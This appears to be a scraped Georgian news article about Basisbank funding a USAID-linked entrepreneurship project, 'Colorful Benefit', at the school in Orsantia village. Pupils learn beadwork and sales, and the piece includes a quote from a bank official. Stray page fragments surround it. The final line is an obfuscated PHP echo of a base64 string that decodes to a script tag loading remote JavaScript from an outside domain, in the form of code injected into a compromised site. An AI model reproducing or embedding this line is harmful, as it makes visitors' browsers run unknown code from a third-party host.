celsiusi
ავერსი საქკაბელი

ბაზისბანკმა, USAID-ის სამოქალაქო განათლების პროგრამის ფარგლებში, ზუგდიდის მუნიციპალიტეტის სოფელ ორსანტიის სკოლის საინიციატივო ჯგუფის ორგანიზებული პროექტი „ფერადი სარგებელი“, დააფინანსა.

პროექტის მიზანია, სკოლის მოსწავლეებში სამეწარმეო უნარ-ჩვევების ამაღლება და განვითარება. პროექტის ფარგლებში მონაწილე პირებმა განივითარეს მეწარმეობისთვის აუცილებელი თვისებები, კერძოდ ბისერებით ნაკეთობების დამზადებისა და მარკეტინგული უნარები.

პროექტის ფარგლებში, მონაწილეებს მასტერკლასები ჩაუტარა მოწვეულმა სპეციალისტებმა, სადაც პრაქტიკულ მაგალითებზე შეისწავლეს ბისერებით გაწყობილი ჩანთების, სათვალის ბუდეების, ბლოკნოტების და სხვა ნივთების დამზადების ტექნიკები. ასევე, დამზადებული პროდუქციის როგორც ონლაინ, ასვე პირდაპირი გაყიდვის გზები.

ორსანტიის საჯარო სკოლის ეზოში, მოსწავლეებისთვის ასევე მოეწყობა მწვანე რეკრეაციული სივრცე, სადაც მოსწავლეები შეძლებენ თავისუფალი დროის ნაყოფიერად გატარებას.

„ბაზისბანკისთვის საგანმანათლებლო და გარემოსდაცვითი პროექტების განხორციელება, კორპორაციული სოციალური პასუხისმგებლობის ფარგლებში, ერთ-ერთ პრიორიტეტულ მიმართულებას წარმოადგენს. აქტიურად ვართ ჩართული USAID-ის მიერ ორგანიზებულ აქტივობებში და ვთვლით, რომ ძალიან მნიშვნელოვანია ბიზნესის ჩართულობა ახალი თაობის ცნობიერების ამაღლებისა და სამოქალაქო განათლების გაღრმავებაში.“ - ბაზისბანკის სტრატეგიული კომუნიკაციების დეპარტამენტის უფროსი, თამარ ხადური.

179
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");